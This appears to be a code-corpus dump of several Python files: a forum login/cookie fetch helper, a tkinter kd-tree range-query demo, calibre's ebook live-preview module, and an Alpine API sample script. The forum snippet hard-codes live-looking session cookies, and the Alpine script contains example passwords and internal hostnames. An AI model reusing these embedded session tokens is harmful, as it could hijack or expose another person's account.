def get(self):
self.setheader()
return requests.get(self.url, cookies=self.cookies, headers=self.headers).text
def getWithCookies(self):
self.setheader()
return requests.get(self.url, cookies=self.cookies, headers=self.headers)
def postWithCookies(self):
pass
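
# Sketch of the credential path (verify=False): __init__ then posts
# logindata to loginurl and keeps the returned cookies. Field names depend
# on the target forum, so these values are placeholders:
#
#   l = Login(verify=False,
#             url="http://bbs.ithome.com/home.php?mod=spacecp",
#             loginurl="http://bbs.ithome.com/member.php?mod=logging"
#                      "&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes",
#             logindata={"username": "user", "password": "pass"})
#   print(l.get())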
login = Login(
verify=True,
url="http://bbs.3dmgame.com/home.php?mod=task&do=apply&id=9",
loginurl="http://bbs.ithome.com/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes",
logindata={"username": "", "password": ""},
# url="http://bbs.ithome.com/home.php?mod=spacecp&ac=usergroup",
cookies=dict(
uchome_2132_auth="5b3bx5iQyK2yuyALeoJChdkEnVAbAJZnz%2FPV5yjjdfpV9nW7JWrzPG21s1Sr8zq1eTzxPYTqCNFRm36S3%2FoGduom8AHI",
uchome_2132_cookiereport="a163d4ArUbOfwx5PFQdjebMJMkqzbiRCt5N2M3%2F7yH5gpTMK%2BfCt",
uchome_2132_checkpm="0",
uchome_2132_connect_is_bind="0",
uchome_2132_home_diymode="1",
uchome_2132_lastact="1409282454%09home.php%09task",
uchome_2132_lastvisit="1409278415",
uchome_2132_noticeTitle="1",
uchome_2132_saltkey="NGlCLgkr",
uchome_2132_sid="C99oC1"
))
print(login.getWithCookies().text)
| gpl-2.0 | -2,216,983,034,984,773,400 | 33.761905 | 124 | 0.614041 | false | 3.001028 | false | false | false |
heineman/algorithms-nutshell-2ed | PythonCode/demo/app_kd_range.py | 1 | 5297 | """
Demonstration application for range search using kd tree.
Left mouse adds point.
Right mouse click begins drag of rectangle.
"""
import tkinter
from adk.kd import KDTree, X, Y, VERTICAL
from adk.region import Region, minValue, maxValue
RectangleSize = 4
class KDTreeApp:
def __init__(self):
"""App for creating KD tree dynamically and executing range queries."""
self.tree = KDTree()
self.static = False
# for range query
self.selectedRegion = None
self.queryRect = None
self.master = tkinter.Tk()
self.master.title('KD Tree Range Query Application')
self.w = tkinter.Frame(self.master, width=410, height=410)
self.canvas = tkinter.Canvas(self.w, width=400, height=400)
self.paint()
self.canvas.bind("<Button-1>", self.click)
self.canvas.bind("<Motion>", self.moved)
self.canvas.bind("<Button-3>", self.range) # when right mouse clicked
self.canvas.bind("<ButtonRelease-3>", self.clear)
self.canvas.bind("<B3-Motion>", self.range) # only when right mouse dragged
self.w.pack()
def toCartesian(self, y):
"""Convert tkinter point into Cartesian."""
return self.w.winfo_height() - y
def toTk(self,y):
"""Convert Cartesian into tkinter point."""
if y == maxValue: return 0
tk_y = self.w.winfo_height()
if y != minValue:
tk_y -= y
return tk_y
def clear(self, event):
"""End of range search."""
self.selectedRegion = None
self.paint()
def range(self, event):
"""Initiate a range search using a selected rectangular region."""
p = (event.x, self.toCartesian(event.y))
if self.selectedRegion is None:
self.selectedStart = Region(p[X],p[Y], p[X],p[Y])
self.selectedRegion = self.selectedStart.unionPoint(p)
self.paint()
# return (node,status) where status is True if draining entire tree rooted at node. Draw these
# as shaded red rectangle to identify whole sub-tree is selected.
for pair in self.tree.range(self.selectedRegion):
p = pair[0].point
if pair[1]:
self.canvas.create_rectangle(pair[0].region.x_min, self.toTk(pair[0].region.y_min),
pair[0].region.x_max, self.toTk(pair[0].region.y_max),
fill='Red', stipple='gray12')
else:
self.canvas.create_rectangle(p[X] - RectangleSize, self.toTk(p[Y]) - RectangleSize,
p[X] + RectangleSize, self.toTk(p[Y]) + RectangleSize, fill='Red')
self.queryRect = self.canvas.create_rectangle(self.selectedRegion.x_min, self.toTk(self.selectedRegion.y_min),
self.selectedRegion.x_max, self.toTk(self.selectedRegion.y_max),
outline='Red', dash=(2, 4))
def moved(self, event):
"""Only here for static option."""
if self.static:
self.paint()
def click(self, event):
"""Add point to KDtree."""
p = (event.x, self.toCartesian(event.y))
self.tree.add(p)
self.paint()
    def drawPartition(self, r, p, orient):
"""Draw partitioning line and points itself as a small square."""
if orient == VERTICAL:
self.canvas.create_line(p[X], self.toTk(r.y_min), p[X], self.toTk(r.y_max))
else:
xlow = r.x_min
if r.x_min <= minValue: xlow = 0
xhigh = r.x_max
if r.x_max >= maxValue: xhigh = self.w.winfo_width()
self.canvas.create_line(xlow, self.toTk(p[Y]), xhigh, self.toTk(p[Y]))
self.canvas.create_rectangle(p[X] - RectangleSize, self.toTk(p[Y]) - RectangleSize,
p[X] + RectangleSize, self.toTk(p[Y]) + RectangleSize, fill='Black')
    def visit(self, n):
        """Visit node to paint properly."""
        if n is None: return
self.drawPartition(n.region, n.point, n.orient)
self.visit (n.below)
self.visit (n.above)
def prepare(self, event):
"""prepare to add points."""
if self.label:
self.label.destroy()
self.label = None
self.canvas.pack()
def paint(self):
"""Paint quad tree by visiting all nodes, or show introductory message."""
if self.tree.root:
self.canvas.delete(tkinter.ALL)
self.visit(self.tree.root)
else:
self.label = tkinter.Label(self.w, width=100, height = 40, text="Click To Add Points")
self.label.bind("<Button-1>", self.prepare)
self.label.pack()
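
# Console sketch of the same range protocol used in range() above (assumes
# the adk.kd/adk.region API as imported in this file; Region takes
# x_min, y_min, x_max, y_max):
#
#   t = KDTree()
#   for pt in [(10, 20), (30, 40), (120, 200)]:
#       t.add(pt)
#   for node, drained in t.range(Region(0, 0, 50, 50)):
#       print(node.point, 'entire subtree' if drained else 'single point')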
if __name__ == "__main__":
app = KDTreeApp()
app.w.mainloop()
| mit | 6,429,294,040,961,874,000 | 34.531034 | 120 | 0.521805 | false | 3.958894 | false | false | false |
ns950/calibre | src/calibre/gui2/tweak_book/preview.py | 3 | 25045 | #!/usr/bin/env python2
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2013, Kovid Goyal <kovid at kovidgoyal.net>'
import time, textwrap, json
from bisect import bisect_right
from base64 import b64encode
from future_builtins import map
from threading import Thread
from Queue import Queue, Empty
from functools import partial
from urlparse import urlparse
from PyQt5.Qt import (
QWidget, QVBoxLayout, QApplication, QSize, QNetworkAccessManager, QMenu, QIcon,
QNetworkReply, QTimer, QNetworkRequest, QUrl, Qt, QNetworkDiskCache, QToolBar,
pyqtSlot, pyqtSignal)
from PyQt5.QtWebKitWidgets import QWebView, QWebInspector, QWebPage
from calibre import prints
from calibre.constants import iswindows
from calibre.ebooks.oeb.polish.parsing import parse
from calibre.ebooks.oeb.base import serialize, OEB_DOCS
from calibre.ptempfile import PersistentTemporaryDirectory
from calibre.gui2 import error_dialog, open_url
from calibre.gui2.tweak_book import current_container, editors, tprefs, actions, TOP
from calibre.gui2.viewer.documentview import apply_settings
from calibre.gui2.viewer.config import config
from calibre.gui2.widgets2 import HistoryLineEdit2
from calibre.utils.ipc.simple_worker import offload_worker
shutdown = object()
def get_data(name):
'Get the data for name. Returns a unicode string if name is a text document/stylesheet'
if name in editors:
return editors[name].get_raw_data()
return current_container().raw_data(name)
# Parsing of html to add linenumbers {{{
def parse_html(raw):
root = parse(raw, decoder=lambda x:x.decode('utf-8'), line_numbers=True, linenumber_attribute='data-lnum')
return serialize(root, 'text/html').encode('utf-8')
class ParseItem(object):
__slots__ = ('name', 'length', 'fingerprint', 'parsing_done', 'parsed_data')
def __init__(self, name):
self.name = name
self.length, self.fingerprint = 0, None
self.parsed_data = None
self.parsing_done = False
def __repr__(self):
        return 'ParseItem(name=%r, length=%r, fingerprint=%r, parsing_done=%r, parsed_data_is_None=%r)' % (
self.name, self.length, self.fingerprint, self.parsing_done, self.parsed_data is None)
class ParseWorker(Thread):
daemon = True
SLEEP_TIME = 1
def __init__(self):
Thread.__init__(self)
self.requests = Queue()
self.request_count = 0
self.parse_items = {}
self.launch_error = None
def run(self):
mod, func = 'calibre.gui2.tweak_book.preview', 'parse_html'
try:
# Connect to the worker and send a dummy job to initialize it
self.worker = offload_worker(priority='low')
self.worker(mod, func, '<p></p>')
except:
import traceback
traceback.print_exc()
self.launch_error = traceback.format_exc()
return
while True:
time.sleep(self.SLEEP_TIME)
x = self.requests.get()
requests = [x]
while True:
try:
requests.append(self.requests.get_nowait())
except Empty:
break
if shutdown in requests:
self.worker.shutdown()
break
request = sorted(requests, reverse=True)[0]
del requests
pi, data = request[1:]
try:
res = self.worker(mod, func, data)
except:
import traceback
traceback.print_exc()
else:
pi.parsing_done = True
parsed_data = res['result']
if res['tb']:
prints("Parser error:")
prints(res['tb'])
else:
pi.parsed_data = parsed_data
def add_request(self, name):
data = get_data(name)
ldata, hdata = len(data), hash(data)
pi = self.parse_items.get(name, None)
if pi is None:
self.parse_items[name] = pi = ParseItem(name)
else:
if pi.parsing_done and pi.length == ldata and pi.fingerprint == hdata:
return
pi.parsed_data = None
pi.parsing_done = False
pi.length, pi.fingerprint = ldata, hdata
self.requests.put((self.request_count, pi, data))
self.request_count += 1
def shutdown(self):
self.requests.put(shutdown)
def get_data(self, name):
return getattr(self.parse_items.get(name, None), 'parsed_data', None)
def clear(self):
self.parse_items.clear()
def is_alive(self):
return Thread.is_alive(self) or (hasattr(self, 'worker') and self.worker.is_alive())
parse_worker = ParseWorker()
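
# The worker is consumed with a simple request/poll protocol (this is how
# NetworkReply below uses it):
#
#   parse_worker.add_request(name)        # queue a (re-)parse if the text changed
#   data = parse_worker.get_data(name)    # None until parsing_done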
# }}}
# Override network access to load data "live" from the editors {{{
class NetworkReply(QNetworkReply):
def __init__(self, parent, request, mime_type, name):
QNetworkReply.__init__(self, parent)
self.setOpenMode(QNetworkReply.ReadOnly | QNetworkReply.Unbuffered)
self.setRequest(request)
self.setUrl(request.url())
self._aborted = False
if mime_type in OEB_DOCS:
self.resource_name = name
QTimer.singleShot(0, self.check_for_parse)
else:
data = get_data(name)
if isinstance(data, type('')):
data = data.encode('utf-8')
mime_type += '; charset=utf-8'
self.__data = data
self.setHeader(QNetworkRequest.ContentTypeHeader, mime_type)
self.setHeader(QNetworkRequest.ContentLengthHeader, len(self.__data))
QTimer.singleShot(0, self.finalize_reply)
def check_for_parse(self):
if self._aborted:
return
data = parse_worker.get_data(self.resource_name)
if data is None:
return QTimer.singleShot(10, self.check_for_parse)
self.__data = data
self.setHeader(QNetworkRequest.ContentTypeHeader, 'application/xhtml+xml; charset=utf-8')
self.setHeader(QNetworkRequest.ContentLengthHeader, len(self.__data))
self.finalize_reply()
def bytesAvailable(self):
try:
return len(self.__data)
except AttributeError:
return 0
def isSequential(self):
return True
def abort(self):
self._aborted = True
def readData(self, maxlen):
ans, self.__data = self.__data[:maxlen], self.__data[maxlen:]
return ans
read = readData
def finalize_reply(self):
if self._aborted:
return
self.setFinished(True)
self.setAttribute(QNetworkRequest.HttpStatusCodeAttribute, 200)
self.setAttribute(QNetworkRequest.HttpReasonPhraseAttribute, "Ok")
self.metaDataChanged.emit()
self.downloadProgress.emit(len(self.__data), len(self.__data))
self.readyRead.emit()
self.finished.emit()
class NetworkAccessManager(QNetworkAccessManager):
OPERATION_NAMES = {getattr(QNetworkAccessManager, '%sOperation'%x) :
x.upper() for x in ('Head', 'Get', 'Put', 'Post', 'Delete',
'Custom')
}
def __init__(self, *args):
QNetworkAccessManager.__init__(self, *args)
self.current_root = None
self.cache = QNetworkDiskCache(self)
self.setCache(self.cache)
self.cache.setCacheDirectory(PersistentTemporaryDirectory(prefix='disk_cache_'))
self.cache.setMaximumCacheSize(0)
def createRequest(self, operation, request, data):
url = unicode(request.url().toString(QUrl.None))
if operation == self.GetOperation and url.startswith('file://'):
path = url[7:]
if iswindows and path.startswith('/'):
path = path[1:]
c = current_container()
try:
name = c.abspath_to_name(path, root=self.current_root)
except ValueError: # Happens on windows with absolute paths on different drives
name = None
if c.has_name(name):
try:
return NetworkReply(self, request, c.mime_map.get(name, 'application/octet-stream'), name)
except Exception:
import traceback
traceback.print_exc()
return QNetworkAccessManager.createRequest(self, operation, request, data)
# }}}
def uniq(vals):
''' Remove all duplicates from vals, while preserving order. '''
vals = vals or ()
seen = set()
seen_add = seen.add
return tuple(x for x in vals if x not in seen and not seen_add(x))
def find_le(a, x):
    'Find rightmost value in a less than or equal to x'
    i = bisect_right(a, x)
    if i:
        return a[i - 1]
    return a[0]
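
# Quick behaviour notes for the two helpers above:
#   uniq([3, 1, 3, 2])      -> (3, 1, 2)
#   find_le([2, 5, 9], 6)   -> 5
#   find_le([2, 5, 9], 1)   -> 2   (clamped to the first value)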
class WebPage(QWebPage):
sync_requested = pyqtSignal(object, object, object)
split_requested = pyqtSignal(object, object)
def __init__(self, parent):
QWebPage.__init__(self, parent)
settings = self.settings()
apply_settings(settings, config().parse())
settings.setMaximumPagesInCache(0)
settings.setAttribute(settings.JavaEnabled, False)
settings.setAttribute(settings.PluginsEnabled, False)
settings.setAttribute(settings.PrivateBrowsingEnabled, True)
settings.setAttribute(settings.JavascriptCanOpenWindows, False)
settings.setAttribute(settings.JavascriptCanAccessClipboard, False)
settings.setAttribute(settings.LinksIncludedInFocusChain, False)
settings.setAttribute(settings.DeveloperExtrasEnabled, True)
settings.setDefaultTextEncoding('utf-8')
data = 'data:text/css;charset=utf-8;base64,'
css = '[data-in-split-mode="1"] [data-is-block="1"]:hover { cursor: pointer !important; border-top: solid 5px green !important }'
data += b64encode(css.encode('utf-8'))
settings.setUserStyleSheetUrl(QUrl(data))
self.setNetworkAccessManager(NetworkAccessManager(self))
self.setLinkDelegationPolicy(self.DelegateAllLinks)
self.mainFrame().javaScriptWindowObjectCleared.connect(self.init_javascript)
self.init_javascript()
@dynamic_property
def current_root(self):
def fget(self):
return self.networkAccessManager().current_root
def fset(self, val):
self.networkAccessManager().current_root = val
return property(fget=fget, fset=fset)
def javaScriptConsoleMessage(self, msg, lineno, source_id):
prints('preview js:%s:%s:'%(unicode(source_id), lineno), unicode(msg))
def init_javascript(self):
if not hasattr(self, 'js'):
from calibre.utils.resources import compiled_coffeescript
self.js = compiled_coffeescript('ebooks.oeb.display.utils', dynamic=False)
self.js += P('csscolorparser.js', data=True, allow_user_override=False)
self.js += compiled_coffeescript('ebooks.oeb.polish.preview', dynamic=False)
self._line_numbers = None
mf = self.mainFrame()
mf.addToJavaScriptWindowObject("py_bridge", self)
mf.evaluateJavaScript(self.js)
@pyqtSlot(str, str, str)
def request_sync(self, tag_name, href, sourceline_address):
try:
self.sync_requested.emit(unicode(tag_name), unicode(href), json.loads(unicode(sourceline_address)))
except (TypeError, ValueError, OverflowError, AttributeError):
pass
def go_to_anchor(self, anchor, lnum):
self.mainFrame().evaluateJavaScript('window.calibre_preview_integration.go_to_anchor(%s, %s)' % (
json.dumps(anchor), json.dumps(str(lnum))))
@pyqtSlot(str, str)
def request_split(self, loc, totals):
actions['split-in-preview'].setChecked(False)
loc, totals = json.loads(unicode(loc)), json.loads(unicode(totals))
if not loc or not totals:
return error_dialog(self.view(), _('Invalid location'),
_('Cannot split on the body tag'), show=True)
self.split_requested.emit(loc, totals)
@property
def line_numbers(self):
if self._line_numbers is None:
def atoi(x):
try:
ans = int(x)
except (TypeError, ValueError):
ans = None
return ans
val = self.mainFrame().evaluateJavaScript('window.calibre_preview_integration.line_numbers()')
self._line_numbers = sorted(uniq(filter(lambda x:x is not None, map(atoi, val))))
return self._line_numbers
def go_to_line(self, lnum):
try:
lnum = find_le(self.line_numbers, lnum)
except IndexError:
return
self.mainFrame().evaluateJavaScript(
'window.calibre_preview_integration.go_to_line(%d)' % lnum)
def go_to_sourceline_address(self, sourceline_address):
lnum, tags = sourceline_address
if lnum is None:
return
tags = [x.lower() for x in tags]
self.mainFrame().evaluateJavaScript(
'window.calibre_preview_integration.go_to_sourceline_address(%d, %s)' % (lnum, json.dumps(tags)))
def split_mode(self, enabled):
self.mainFrame().evaluateJavaScript(
'window.calibre_preview_integration.split_mode(%s)' % (
'true' if enabled else 'false'))
class WebView(QWebView):
def __init__(self, parent=None):
QWebView.__init__(self, parent)
self.inspector = QWebInspector(self)
w = QApplication.instance().desktop().availableGeometry(self).width()
self._size_hint = QSize(int(w/3), int(w/2))
self._page = WebPage(self)
self.setPage(self._page)
self.inspector.setPage(self._page)
self.clear()
self.setAcceptDrops(False)
def sizeHint(self):
return self._size_hint
def refresh(self):
self.pageAction(self.page().Reload).trigger()
@dynamic_property
def scroll_pos(self):
def fget(self):
mf = self.page().mainFrame()
return (mf.scrollBarValue(Qt.Horizontal), mf.scrollBarValue(Qt.Vertical))
def fset(self, val):
mf = self.page().mainFrame()
mf.setScrollBarValue(Qt.Horizontal, val[0])
mf.setScrollBarValue(Qt.Vertical, val[1])
return property(fget=fget, fset=fset)
def clear(self):
self.setHtml(_(
'''
<h3>Live preview</h3>
<p>Here you will see a live preview of the HTML file you are currently editing.
The preview will update automatically as you make changes.
<p style="font-size:x-small; color: gray">Note that this is a quick preview
only, it is not intended to simulate an actual ebook reader. Some
aspects of your ebook will not work, such as page breaks and page margins.
'''))
self.page().current_root = None
def setUrl(self, qurl):
self.page().current_root = current_container().root
return QWebView.setUrl(self, qurl)
def inspect(self):
self.inspector.parent().show()
self.inspector.parent().raise_()
self.pageAction(self.page().InspectElement).trigger()
def contextMenuEvent(self, ev):
menu = QMenu(self)
p = self.page()
mf = p.mainFrame()
r = mf.hitTestContent(ev.pos())
url = unicode(r.linkUrl().toString(QUrl.None)).strip()
ca = self.pageAction(QWebPage.Copy)
if ca.isEnabled():
menu.addAction(ca)
menu.addAction(actions['reload-preview'])
menu.addAction(QIcon(I('debug.png')), _('Inspect element'), self.inspect)
if url.partition(':')[0].lower() in {'http', 'https'}:
menu.addAction(_('Open link'), partial(open_url, r.linkUrl()))
menu.exec_(ev.globalPos())
class Preview(QWidget):
sync_requested = pyqtSignal(object, object)
split_requested = pyqtSignal(object, object, object)
split_start_requested = pyqtSignal()
link_clicked = pyqtSignal(object, object)
refresh_starting = pyqtSignal()
refreshed = pyqtSignal()
def __init__(self, parent=None):
QWidget.__init__(self, parent)
self.l = l = QVBoxLayout()
self.setLayout(l)
l.setContentsMargins(0, 0, 0, 0)
self.view = WebView(self)
self.view.page().sync_requested.connect(self.request_sync)
self.view.page().split_requested.connect(self.request_split)
self.view.page().loadFinished.connect(self.load_finished)
self.inspector = self.view.inspector
self.inspector.setPage(self.view.page())
l.addWidget(self.view)
self.bar = QToolBar(self)
l.addWidget(self.bar)
ac = actions['auto-reload-preview']
ac.setCheckable(True)
ac.setChecked(True)
ac.toggled.connect(self.auto_reload_toggled)
self.auto_reload_toggled(ac.isChecked())
self.bar.addAction(ac)
ac = actions['sync-preview-to-editor']
ac.setCheckable(True)
ac.setChecked(True)
ac.toggled.connect(self.sync_toggled)
self.sync_toggled(ac.isChecked())
self.bar.addAction(ac)
self.bar.addSeparator()
ac = actions['split-in-preview']
ac.setCheckable(True)
ac.setChecked(False)
ac.toggled.connect(self.split_toggled)
self.split_toggled(ac.isChecked())
self.bar.addAction(ac)
ac = actions['reload-preview']
ac.triggered.connect(self.refresh)
self.bar.addAction(ac)
actions['preview-dock'].toggled.connect(self.visibility_changed)
self.current_name = None
self.last_sync_request = None
self.refresh_timer = QTimer(self)
self.refresh_timer.timeout.connect(self.refresh)
parse_worker.start()
self.current_sync_request = None
self.search = HistoryLineEdit2(self)
self.search.initialize('tweak_book_preview_search')
self.search.setPlaceholderText(_('Search in preview'))
self.search.returnPressed.connect(partial(self.find, 'next'))
self.bar.addSeparator()
self.bar.addWidget(self.search)
for d in ('next', 'prev'):
ac = actions['find-%s-preview' % d]
ac.triggered.connect(partial(self.find, d))
self.bar.addAction(ac)
def find(self, direction):
text = unicode(self.search.text())
self.view.findText(text, QWebPage.FindWrapsAroundDocument | (
QWebPage.FindBackward if direction == 'prev' else QWebPage.FindFlags(0)))
def request_sync(self, tagname, href, lnum):
if self.current_name:
c = current_container()
if tagname == 'a' and href:
if href and href.startswith('#'):
name = self.current_name
else:
name = c.href_to_name(href, self.current_name) if href else None
if name == self.current_name:
return self.view.page().go_to_anchor(urlparse(href).fragment, lnum)
if name and c.exists(name) and c.mime_map[name] in OEB_DOCS:
return self.link_clicked.emit(name, urlparse(href).fragment or TOP)
self.sync_requested.emit(self.current_name, lnum)
def request_split(self, loc, totals):
if self.current_name:
self.split_requested.emit(self.current_name, loc, totals)
def sync_to_editor(self, name, sourceline_address):
self.current_sync_request = (name, sourceline_address)
QTimer.singleShot(100, self._sync_to_editor)
def _sync_to_editor(self):
if not actions['sync-preview-to-editor'].isChecked():
return
try:
if self.refresh_timer.isActive() or self.current_sync_request[0] != self.current_name:
return QTimer.singleShot(100, self._sync_to_editor)
except TypeError:
return # Happens if current_sync_request is None
sourceline_address = self.current_sync_request[1]
self.current_sync_request = None
self.view.page().go_to_sourceline_address(sourceline_address)
def report_worker_launch_error(self):
if parse_worker.launch_error is not None:
tb, parse_worker.launch_error = parse_worker.launch_error, None
error_dialog(self, _('Failed to launch worker'), _(
'Failed to launch the worker process used for rendering the preview'), det_msg=tb, show=True)
def show(self, name):
if name != self.current_name:
self.refresh_timer.stop()
self.current_name = name
self.report_worker_launch_error()
parse_worker.add_request(name)
self.view.setUrl(QUrl.fromLocalFile(current_container().name_to_abspath(name)))
return True
def refresh(self):
if self.current_name:
self.refresh_timer.stop()
# This will check if the current html has changed in its editor,
# and re-parse it if so
self.report_worker_launch_error()
parse_worker.add_request(self.current_name)
# Tell webkit to reload all html and associated resources
current_url = QUrl.fromLocalFile(current_container().name_to_abspath(self.current_name))
self.refresh_starting.emit()
if current_url != self.view.url():
# The container was changed
self.view.setUrl(current_url)
else:
self.view.refresh()
self.refreshed.emit()
def clear(self):
self.view.clear()
self.current_name = None
@property
def current_root(self):
return self.view.page().current_root
@property
def is_visible(self):
return actions['preview-dock'].isChecked()
@property
def live_css_is_visible(self):
try:
return actions['live-css-dock'].isChecked()
except KeyError:
return False
def start_refresh_timer(self):
if self.live_css_is_visible or (self.is_visible and actions['auto-reload-preview'].isChecked()):
self.refresh_timer.start(tprefs['preview_refresh_time'] * 1000)
def stop_refresh_timer(self):
self.refresh_timer.stop()
def auto_reload_toggled(self, checked):
if self.live_css_is_visible and not actions['auto-reload-preview'].isChecked():
actions['auto-reload-preview'].setChecked(True)
error_dialog(self, _('Cannot disable'), _(
'Auto reloading of the preview panel cannot be disabled while the'
' Live CSS panel is open.'), show=True)
actions['auto-reload-preview'].setToolTip(_(
'Auto reload preview when text changes in editor') if not checked else _(
'Disable auto reload of preview'))
def sync_toggled(self, checked):
actions['sync-preview-to-editor'].setToolTip(_(
'Disable syncing of preview position to editor position') if checked else _(
'Enable syncing of preview position to editor position'))
def visibility_changed(self, is_visible):
if is_visible:
self.refresh()
def split_toggled(self, checked):
actions['split-in-preview'].setToolTip(textwrap.fill(_(
'Abort file split') if checked else _(
'Split this file at a specified location.\n\nAfter clicking this button, click'
' inside the preview panel above at the location you want the file to be split.')))
if checked:
self.split_start_requested.emit()
else:
self.view.page().split_mode(False)
def do_start_split(self):
self.view.page().split_mode(True)
def stop_split(self):
actions['split-in-preview'].setChecked(False)
def load_finished(self, ok):
if actions['split-in-preview'].isChecked():
if ok:
self.do_start_split()
else:
self.stop_split()
def apply_settings(self):
s = self.view.page().settings()
s.setFontSize(s.DefaultFontSize, tprefs['preview_base_font_size'])
s.setFontSize(s.DefaultFixedFontSize, tprefs['preview_mono_font_size'])
s.setFontSize(s.MinimumLogicalFontSize, tprefs['preview_minimum_font_size'])
s.setFontSize(s.MinimumFontSize, tprefs['preview_minimum_font_size'])
sf, ssf, mf = tprefs['preview_serif_family'], tprefs['preview_sans_family'], tprefs['preview_mono_family']
s.setFontFamily(s.StandardFont, {'serif':sf, 'sans':ssf, 'mono':mf, None:sf}[tprefs['preview_standard_font_family']])
s.setFontFamily(s.SerifFont, sf)
s.setFontFamily(s.SansSerifFont, ssf)
s.setFontFamily(s.FixedFont, mf)
| gpl-3.0 | -1,991,309,667,338,330,600 | 37.471582 | 137 | 0.615053 | false | 3.913281 | false | false | false |
AlpineNow/python-alpine-api | examples/workfile.py | 1 | 10557 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to Alpine Data, Inc.
# Copyright 2017 Alpine Data All Rights reserved.
"""Simple Command-Line Sample For Alpine API.
Command-line application that logs in, creates a sample user and workspace,
uploads a workflow and runs it with the Alpine API.
Usage:
    $ python workfile.py host=[host] port=[port] user=[username] password=[password]
To get detailed log output, configure the loggers used below, e.g. with
logging.basicConfig(level=logging.DEBUG).
"""
import logging
import sys
import time
from alpine.exception import *
from alpine import *
from future.datasource import DataSource
def help():
print("Usage: host=[host] port=[port] user=[username] password=[password]")
def setUp(alpine_host, alpine_port, username, password):
global db_data_source_id
global hadoop_data_source_id
global sample_datasource_db_name
global sample_datasource_hadoop_name
sample_datasource_db_name = "Demo_GP"
sample_datasource_hadoop_name = "Demo_Hadoop"
alpine_session = APIClient(alpine_host, alpine_port)
# Login with the admin user credential
alpine_session.login(username, password)
db_data_source_id = alpine_session.datasource.get_id(sample_datasource_db_name, "Database")
hadoop_data_source_id = alpine_session.datasource.get_id(sample_datasource_hadoop_name, "Hadoop")
# # Demo Database Info (Greenplum)
# sample_datasource_db_description = "Test Greenplum"
# sample_datasource_db_host = "10.10.0.151"
# sample_datasource_db_port = 5432
# sample_datasource_db_database_name = "miner_demo"
# sample_datasource_db_database_username = "miner_demo"
# sample_datasource_db_database_password = "miner_demo"
#
# # Demo Hadoop Info (Cloudera CDH5.7)
# sample_datasource_hadoop_version_string = "Cloudera CDH5.4-5.7"
# sample_datasource_hadoop_description = "Test Cloudera"
# sample_datasource_hadoop_namenode_host = "awscdh57singlenode.alpinenow.local"
# sample_datasource_hadoop_namenode_port = 8020
# sample_datasource_hadoop_resource_manager_host = "awscdh57singlenode.alpinenow.local"
# sample_datasource_hadoop_resource_manager_port = 8032
# sample_datasource_hadoop_username = "yarn"
# sample_datasource_hadoop_group_list = "hadoop"
# sample_datasource_hadoop_additional_parameters = [
# {"key": "mapreduce.jobhistory.address", "value": "awscdh57singlenode.alpinenow.local:10020"},
# {"key": "mapreduce.jobhistory.webapp.address", "value": "awscdh57singlenode.alpinenow.local:19888"},
# {"key": "yarn.app.mapreduce.am.staging-dir", "value": "/tmp"},
# {"key": "yarn.resourcemanager.admin.address", "value": "awscdh57singlenode.alpinenow.local:8033"},
# {"key": "yarn.resourcemanager.resource-tracker.address",
# "value": "awscdh57singlenode.alpinenow.local:8031"},
# {"key": "yarn.resourcemanager.scheduler.address", "value": "awscdh57singlenode.alpinenow.local:8030"}
# ]
# ds = DataSource(alpine_session.base_url, alpine_session.session, alpine_session.token)
# ds.delete_db_data_source_if_exists(sample_datasource_db_name)
# datasource_gp = ds.add_greenplum_data_source(sample_datasource_db_name,
# sample_datasource_db_description,
# sample_datasource_db_host,
# sample_datasource_db_port,
# sample_datasource_db_database_name,
# sample_datasource_db_database_username,
# sample_datasource_db_database_password)
#
# # Create a Hadoop datasource
# ds.delete_hadoop_data_source_if_exists(sample_datasource_hadoop_name)
#
# datasource_hadoop = ds.add_hadoop_data_source(sample_datasource_hadoop_version_string,
# sample_datasource_hadoop_name,
# sample_datasource_hadoop_description,
# sample_datasource_hadoop_namenode_host,
# sample_datasource_hadoop_namenode_port,
# sample_datasource_hadoop_resource_manager_host,
# sample_datasource_hadoop_resource_manager_port,
# sample_datasource_hadoop_username,
# sample_datasource_hadoop_group_list,
# sample_datasource_hadoop_additional_parameters
# )
#
# db_data_source_id = datasource_gp['id']
# hadoop_data_source_id = datasource_hadoop['id']
def tearDown(alpine_host, alpine_port, username, password):
sample_username = "test_user"
sample_workspace_name = "API Sample Workspace"
alpine_session = APIClient(alpine_host, alpine_port)
# Login with the admin user credential
alpine_session.login(username, password)
# Delete the Datasource
# alpine_session.datasource.delete_db_data_source(sample_datasource_db_name)
# response = alpine_session.datasource.delete_hadoop_data_source(sample_datasource_hadoop_name)
# Delete the workspace
response = alpine_session.workspace.delete_workspace(sample_workspace_name)
print("Received response code {0} with reason {1}...".format(response.status_code, response.reason))
# Delete the user.
response = alpine_session.user.delete_user(sample_username)
print("Received response code {0} with reason {1}...".format(response.status_code, response.reason))
def main(alpine_host, alpine_port, username, password):
alpine_host = alpine_host
alpine_port = alpine_port
# Use the setup function to create datasource for use
setUp(alpine_host, alpine_port, username, password)
sample_username = "test_user"
sample_password = "password"
sample_firstname = "First"
sample_lastname = "Last"
sample_member_role = "Business Analyst"
sample_email = "[email protected]"
sample_title = "Title"
sample_deparment = "Department"
sample_admin_type = "admin"
sample_user_type = "analytics_developer"
sample_workspace_name = "API Sample Workspace"
sample_workspace_public_state_true = True
# Create a APIClient session
# alpine_session = APIClient(alpine_host, alpine_port)
# alpine_session.login(username, password)
alpine_session = APIClient(alpine_host, alpine_port, username, password)
# Logging Examples
# use default logger
alpine_session.logger.debug("This is a debug message")
alpine_session.logger.info("This is a info message")
alpine_session.logger.error("This is a error message")
# use a custom logger
custom_logger = logging.getLogger("custom")
custom_logger.debug("This is a custom debug message")
custom_logger.info("This is a custom info message")
custom_logger.error("This is a custom error message")
# Workspace Examples
# Delete sample workspaces if exists
try:
workspace_id = alpine_session.workspace.get_id(workspace_name=sample_workspace_name)
alpine_session.workspace.delete(workspace_id)
except WorkspaceNotFoundException:
pass
# Create a new sample workspace
workspace_info = alpine_session.workspace.create(workspace_name=sample_workspace_name, public=sample_workspace_public_state_true,
summary="")
workspace_id = workspace_info['id']
# User Examples
# Create a new sample user with admin roles
try:
user_id = alpine_session.user.get_id(sample_username)
alpine_session.user.delete(user_id)
except UserNotFoundException:
pass
user_info = alpine_session.user.create(sample_username, sample_password, sample_firstname, sample_lastname, sample_email,
